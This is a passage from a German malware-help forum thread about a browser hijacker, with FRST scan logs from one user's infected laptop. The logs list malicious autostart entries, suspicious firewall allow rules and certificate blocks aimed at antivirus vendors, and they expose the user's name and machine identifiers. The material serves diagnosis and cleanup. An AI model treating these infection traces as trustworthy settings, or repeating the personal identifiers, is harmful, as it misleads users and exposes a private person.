FirewallRules: [UDP Query User{1B711A47-FC46-4A43-A47B-D50E933AE73E}C:\users\nick schuster\desktop\helloneighbor_pre_alpha_-_play_at_your_own_risk\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe] => (Allow) C:\users\nick schuster\desktop\helloneighbor_pre_alpha_-_play_at_your_own_risk\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe
FirewallRules: [TCP Query User{CCD12204-D344-4471-89B4-CE5D09ED25A3}C:\users\nick schuster\desktop\helloneighbor\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe] => (Allow) C:\users\nick schuster\desktop\helloneighbor\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe
FirewallRules: [UDP Query User{4090B209-49DE-4A00-AA22-61541F35DA1C}C:\users\nick schuster\desktop\helloneighbor\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe] => (Allow) C:\users\nick schuster\desktop\helloneighbor\helloneighbor\helloneighbour\binaries\win64\helloneighbour-win64-shipping.exe
FirewallRules: [TCP Query User{D708F925-06D9-4256-8202-3F4762014482}C:\users\nick schuster\desktop\hello_neighbor_alpha_1\hello neighbor alpha 1\helloneighbor\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) C:\users\nick schuster\desktop\hello_neighbor_alpha_1\hello neighbor alpha 1\helloneighbor\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe
FirewallRules: [UDP Query User{3D9EDEFE-8940-4B66-B4F2-C7CE32744C78}C:\users\nick schuster\desktop\hello_neighbor_alpha_1\hello neighbor alpha 1\helloneighbor\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe] => (Allow) C:\users\nick schuster\desktop\hello_neighbor_alpha_1\hello neighbor alpha 1\helloneighbor\helloneighborreborn\binaries\win64\helloneighborreborn-win64-shipping.exe
FirewallRules: [{64204D1E-A55F-44F5-8FA5-1E01527D722E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{32F7B5EA-0ECA-4D23-9F23-07379BEA381C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{4FF95AC7-EC5D-4600-AD0D-055FF8D32293}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{16730D0F-F55B-4954-BE21-012786AF645E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{FF757347-BB96-48C2-895D-3245201BDF29}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{418F7263-9144-4F6E-89C2-567F4FC4D4B2}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Block) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{CC6C422C-F23C-43E9-849F-AB743F6EF50D}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{398F9BD3-E78B-48BB-BA1E-1D07F750B4B8}C:\program files\spiele\call of duty modern warfare remastered\h1_sp64_ship.exe] => (Block) C:\program files\spiele\call of duty modern warfare remastered\h1_sp64_ship.exe
FirewallRules: [UDP Query User{80B3AFDD-761C-4E3D-961B-D5DEEB7D4037}C:\program files\spiele\call of duty modern warfare remastered\h1_sp64_ship.exe] => (Block) C:\program files\spiele\call of duty modern warfare remastered\h1_sp64_ship.exe
FirewallRules: [TCP Query User{BCF4E2CA-404F-42B4-B15A-1DC01A91FCD1}C:\program files (x86)\secondlifeviewer\slvoice.exe] => (Allow) C:\program files (x86)\secondlifeviewer\slvoice.exe
FirewallRules: [UDP Query User{FB5E0AAD-BEBA-4E6E-9548-7D5B5611E704}C:\program files (x86)\secondlifeviewer\slvoice.exe] => (Allow) C:\program files (x86)\secondlifeviewer\slvoice.exe
FirewallRules: [TCP Query User{8BA8D722-6016-406D-9E15-195324DC63A8}C:\users\nick schuster\appdata\local\mycomgames\mycomgames.exe] => (Block) C:\users\nick schuster\appdata\local\mycomgames\mycomgames.exe
FirewallRules: [UDP Query User{7F51C867-76EE-4250-8CF3-7B7EFE720FB8}C:\users\nick schuster\appdata\local\mycomgames\mycomgames.exe] => (Block) C:\users\nick schuster\appdata\local\mycomgames\mycomgames.exe
FirewallRules: [{2B3F7CC6-59B7-4284-858C-F526FDA6E80E}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{6E1A0C9B-71D6-4408-A801-184E33CF6F48}] => (Allow) C:\Users\Nick Schuster\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{A1305C14-D2A3-49FB-B1C5-84DBD2C016EE}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{41BE6AEB-1FB9-4FE8-9A33-6BE94F8777CD}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{00EC57C6-545A-4619-AAD9-ABD42ECD7175}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{6293536B-CA56-4567-8598-4712417A6B4D}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9DF35FDD-92CF-4145-BDB7-D5B71F698ADF}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3.exe
FirewallRules: [{39DD858C-C5D5-4F81-88A5-638EAE48C1E2}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3.exe
FirewallRules: [{43C8EB70-C312-4BD4-98CF-A5D3E0A93072}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3_d3d11.exe
FirewallRules: [{13B756F9-75C0-4EEF-B149-81630829BF6B}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3_d3d11.exe
FirewallRules: [{CD142FC9-8278-4D60-822B-AC672B222BCC}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Updater.exe
FirewallRules: [{EED51691-BE3C-45CE-AE8E-A7D9CF8939E3}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Updater.exe
FirewallRules: [{1C86D69B-F99E-4AB0-9433-9823D1D6C77B}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Editor.exe
FirewallRules: [{9979D1DF-0F9C-4992-BA47-0A5506E83682}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Editor.exe
FirewallRules: [{0E7EF26A-91E2-4A99-A124-767A4E59B4C6}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B50E54E0-7F56-45FF-B941-F4291BC08032}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{EF6BDB74-45D8-46B1-B87C-1FDEE35C6A51}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{EF947C32-1D81-4E83-A695-A9EC9219A3B3}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{653CFC91-4BAB-4C40-9B9E-01CC50B98589}C:\program files (x86)\ubisoft\far cry 4\bin\farcry4.exe] => (Block) C:\program files (x86)\ubisoft\far cry 4\bin\farcry4.exe
FirewallRules: [UDP Query User{B0BC62AE-48DE-42C7-8668-5DD556C0A6B7}C:\program files (x86)\ubisoft\far cry 4\bin\farcry4.exe] => (Block) C:\program files (x86)\ubisoft\far cry 4\bin\farcry4.exe
FirewallRules: [{58DF4819-F2AA-4B93-A157-40849EF94D29}] => (Allow) C:\Windows\system32\rundll32.exe
FirewallRules: [{CBE7A874-9528-4366-AF1B-A0E916028D13}] => (Allow) C:\Users\Nick Schuster\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{1BBF6F32-C108-4369-941D-843982F303E5}] => (Allow) C:\Users\Nick Schuster\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.122-1.0.1976.exe
FirewallRules: [{02B3354A-24E5-4248-8037-D10EC7114CDA}] => (Allow) C:\Users\Nick Schuster\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.122-1.0.1976.exe
FirewallRules: [{ACFC7F43-1E24-4A37-BB80-4D2F71DFD6AC}] => (Allow) C:\Users\Nick Schuster\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.122-1.0.1976.exe
FirewallRules: [{F3EB4D70-44AB-440F-99BE-EC17A5897398}] => (Allow) C:\Users\Nick Schuster\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.122-1.0.1976.exe
FirewallRules: [{A3408888-D09A-47E4-AC38-D0F7F8F347D3}] => (Allow) C:\Program Files (x86)\MIO\loader\hgstxhts721010a9e630_jr10206p1v048m1v048mx.dat
FirewallRules: [{54CC17EB-AE90-4BB9-8A39-D37C3E50D836}] => (Allow) C:\Program Files (x86)\MIO\loader\hgstxhts721010a9e630_jr10206p1v048m1v048mx.dat
FirewallRules: [{33955FCC-97B4-465B-9229-AD6D73EAB1BE}] => (Allow) C:\Program Files (x86)\Applemy\Application\chrome.exe
FirewallRules: [{2C27DBA5-D9A5-4D9B-80D2-3B9661ED9A62}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{BB1CF779-C524-42C1-A743-1CB20B08A776}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{EE31C349-1F57-40DC-9489-63C8AD2C2C63}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{E0A3B4CC-6DC2-47FF-97F6-FC1D2B1DFE26}] => (Allow) C:\Windows\System32\rundll32.exe

==================== Wiederherstellungspunkte =========================

28-05-2017 11:43:38 Windows Update
28-05-2017 20:39:08 DirectX wurde installiert
30-05-2017 14:03:51 Removed Samsung Kies
31-05-2017 17:31:09 Removed Vegas Pro 13.0 (64-bit)
01-06-2017 21:49:48 Installed NetAdapterUpdate

==================== Fehlerhafte Ger鋞e im Ger鋞emanager =============

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: USB2.0-CRW
Description: USB2.0-CRW
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereintr鋑e in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (06/03/2017 01:58:25 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/03/2017 01:58:25 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/03/2017 01:58:25 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/03/2017 01:58:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0xe90
Startzeit der fehlerhaften Anwendung: 0xLiveComm.exe0
Pfad der fehlerhaften Anwendung: LiveComm.exe1
Pfad des fehlerhaften Moduls: LiveComm.exe2
Berichtskennung: LiveComm.exe3
Vollst鋘diger Name des fehlerhaften Pakets: LiveComm.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: LiveComm.exe5

Error: (06/03/2017 01:58:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0xe58
Startzeit der fehlerhaften Anwendung: 0xLiveComm.exe0
Pfad der fehlerhaften Anwendung: LiveComm.exe1
Pfad des fehlerhaften Moduls: LiveComm.exe2
Berichtskennung: LiveComm.exe3
Vollst鋘diger Name des fehlerhaften Pakets: LiveComm.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: LiveComm.exe5

Error: (06/03/2017 01:58:07 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0x3e8
Startzeit der fehlerhaften Anwendung: 0xLiveComm.exe0
Pfad der fehlerhaften Anwendung: LiveComm.exe1
Pfad des fehlerhaften Moduls: LiveComm.exe2
Berichtskennung: LiveComm.exe3
Vollst鋘diger Name des fehlerhaften Pakets: LiveComm.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: LiveComm.exe5

Error: (06/03/2017 01:58:05 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „Microsoft.WindowsAlarms_8wekyb3d8bbwe!App“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/02/2017 05:52:00 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (06/02/2017 05:51:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: LiveComm.exe, Version: 17.5.9600.20911, Zeitstempel: 0x559467ee
Name des fehlerhaften Moduls: msvcr120_app.dll, Version: 12.0.21005.1, Zeitstempel: 0x524f8432
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000000000001ef5f
ID des fehlerhaften Prozesses: 0x540
Startzeit der fehlerhaften Anwendung: 0xLiveComm.exe0
Pfad der fehlerhaften Anwendung: LiveComm.exe1
Pfad des fehlerhaften Moduls: LiveComm.exe2
Berichtskennung: LiveComm.exe3
Vollst鋘diger Name des fehlerhaften Pakets: LiveComm.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: LiveComm.exe5

Error: (06/02/2017 05:22:00 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RAZERLAP)
Description: Bei der Aktivierung der App „microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2144927141. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.


Systemfehler:
=============
Error: (06/03/2017 01:59:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (06/03/2017 01:58:22 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca

Error: (06/03/2017 01:58:21 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca

Error: (06/03/2017 01:58:20 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca

Error: (06/03/2017 01:58:00 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: App.AppX2tphb21dp9jkkycchwvscnrxk12cys3z.mca

Error: (06/03/2017 01:57:58 PM) (Source: DCOM) (EventID: 10016) (User: RAZERLAP)
Description: AnwendungsspezifischLokalStart{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}RAZERLAPNick SchusterS-1-5-21-3847841184-804715454-2304624315-1001LocalHost (unter Verwendung von LRPC)Nicht verf黦barNicht verf黦bar

Error: (06/03/2017 01:57:15 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Microsoft Cache Service" wurde mit folgendem Fehler beendet: 
%%2

Error: (06/03/2017 01:57:15 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Socket Illustration" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (06/03/2017 01:57:13 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "3DM" wurde mit folgendem Fehler beendet: 
%%126

Error: (06/02/2017 05:51:55 PM) (Source: DCOM) (EventID: 10010) (User: RAZERLAP)
Description: Microsoft.WindowsLive.Mail.AppXj3e9v0xw9sf8t58nqr15tqqb2yq4zsfg.mca


CodeIntegrity:
===================================
  Date: 2017-05-03 18:07:17.434
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 18:06:29.117
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 17:37:01.065
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 17:37:00.358
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 17:24:33.560
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-05-03 15:20:35.981
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 16:06:23.178
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 14:48:35.444
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 14:48:35.282
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-03-30 14:48:35.275
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i5-5200U CPU @ 2.20GHz
Prozentuale Nutzung des RAM: 36%
Installierter physikalischer RAM: 4014.84 MB
Verf黦barer physikalischer RAM: 2568.73 MB
Summe virtueller Speicher: 4718.84 MB
Verf黦barer virtueller Speicher: 3391 MB

==================== Laufwerke ================================

Drive c: (NexusLap) (Fixed) (Total:869.8 GB) (Free:752.13 GB) NTFS
Drive d: (Recover) (Fixed) (Total:60 GB) (Free:42.31 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: B8E472D2)

Partition: GPT.

==================== Ende von Addition.txt ============================
         
__________________

Alt 03.06.2017, 21:20   #4
M-K-D-B
/// TB-Ausbilder
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



Servus,



deine Version von FRST ist total veraltet, bitte die aktuellste Version verwenden.

Zudem bitte ich Beachtung meiner Hinweise, insbesondere Punkt 6.

Des Weiteren bitte FRST so ausf黨ren:
  • Starte die FRST erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist.
  • Setze einen Haken vor Dateiliste 90 Tage und dr點ke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner n鋍hsten Antwort.
__________________
Gru
M-K-D-B


==========================================================
offline vom 22.12.2018 bis 01.01.2019
==========================================================

Das Trojaner-Board unterst黷zen

Ge鋘dert von M-K-D-B (03.06.2017 um 21:50 Uhr)

Alt 05.06.2017, 10:31   #5
NexsReloaded
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



ich hab alles auf den desktop installiert und als admin ausgef黨rt aber ich kann den tdss.killer immer noch nicht starten.


FRST Logfile:
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 02-06-2017
durchgef黨rt von Nick Schuster (Administrator) auf RAZERLAP (05-06-2017 10:15:16)
Gestartet von C:\Users\Nick Schuster\Desktop
Geladene Profile: Nick Schuster (Verf黦bare Profile: Nick Schuster)
Platform: Windows 8.1 (Update) (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: "C:\Program Files (x86)\Firefox\Firefox.exe" -osint -url "%1")
Start-Modus: Normal
Anleitung f黵 Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
() C:\ProgramData\windows\windows.exe
() C:\Windows\Temp\gB39B.tmp.exe
() C:\Windows\Temp\gB40B.tmp.exe
() C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe

==================== Registry (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zur點kgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [AirServer64] => C:\Program Files\App Dynamic\AirServer\AirServer.exe
HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
HKLM\...\Run: [gplyra] => C:\Users\Nick Schuster\AppData\Roaming\gplyra\gplyra.exe [1555968 2017-04-24] () <===== ACHTUNG
HKLM-x32\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
HKLM-x32\...\Run: [Dropbox] => "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
HKLM-x32\...\Run: [KMS] => C:\Windows\kmsonboot\autoact.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [235624 2015-01-09] (CANON INC.)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1314432 2016-06-09] (CANON INC.)
HKLM\...\RunOnce: [RAZERLAP] => C:\Windows\TEMP\gB39B.tmp.exe [307200 2017-06-05] () <===== ACHTUNG
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (U)
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (U)
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (U)
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (U)
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (U)
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (U)
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (U)
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
